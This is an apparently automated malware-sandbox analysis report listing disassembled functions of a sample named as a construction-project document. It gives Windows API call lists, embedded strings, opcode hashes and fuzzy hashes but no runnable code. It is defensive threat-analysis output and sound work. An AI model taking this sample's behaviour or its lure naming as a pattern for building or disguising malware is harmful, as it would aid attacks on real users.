                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                          • API String ID: 2618321458-3614832568
                                                                                                                          • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                          • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                          Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                          • malloc.MSVCRT ref: 00417524
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                          • free.MSVCRT ref: 00417544
                                                                                                                          • free.MSVCRT ref: 00417562
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4131324427-0
                                                                                                                          • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                          • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                          Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                          • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                          • free.MSVCRT ref: 0041822B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PathTemp$free
                                                                                                                          • String ID: %s\etilqs_$etilqs_
                                                                                                                          • API String ID: 924794160-1420421710
                                                                                                                          • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                          • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                          Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040FDD5
                                                                                                                            • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                          • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                          • API String ID: 1775345501-2769808009
                                                                                                                          • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                          • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                          • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                          • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                          Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • wcscpy.MSVCRT ref: 0041477F
                                                                                                                          • wcscpy.MSVCRT ref: 0041479A
                                                                                                                          • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                          • String ID: General
                                                                                                                          • API String ID: 999786162-26480598
                                                                                                                          • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                          • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                          Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                          • _snwprintf.MSVCRT ref: 0040977D
                                                                                                                          • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastMessage_snwprintf
                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                          • API String ID: 313946961-1552265934
                                                                                                                          • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                          • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                          Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: foreign key constraint failed$new$oid$old
                                                                                                                          • API String ID: 0-1953309616
                                                                                                                          • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                          • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                          • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                          • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                          Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                          • API String ID: 3510742995-272990098
                                                                                                                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                          Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0044A6EB
                                                                                                                          • memset.MSVCRT ref: 0044A6FB
                                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpymemset
                                                                                                                          • String ID: gj
                                                                                                                          • API String ID: 1297977491-4203073231
                                                                                                                          • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                          • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                          Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                                          • free.MSVCRT ref: 0040E9D3
                                                                                                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@$free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2241099983-0
                                                                                                                          • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                          • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                          • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                          • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                          Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                          • malloc.MSVCRT ref: 004174BD
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                          • free.MSVCRT ref: 004174E4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4053608372-0
                                                                                                                          • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                          • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                          Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetParent.USER32(?), ref: 0040D453
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4247780290-0
                                                                                                                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                          Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                          • memset.MSVCRT ref: 004450CD
                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1471605966-0
                                                                                                                          • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                          • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                          Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • wcscpy.MSVCRT ref: 0044475F
                                                                                                                          • wcscat.MSVCRT ref: 0044476E
                                                                                                                          • wcscat.MSVCRT ref: 0044477F
                                                                                                                          • wcscat.MSVCRT ref: 0044478E
                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
